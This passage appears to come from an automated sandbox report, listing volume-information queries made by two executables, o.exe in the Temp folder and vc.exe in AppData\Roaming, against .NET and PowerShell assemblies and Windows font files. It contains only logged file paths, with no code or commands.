      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
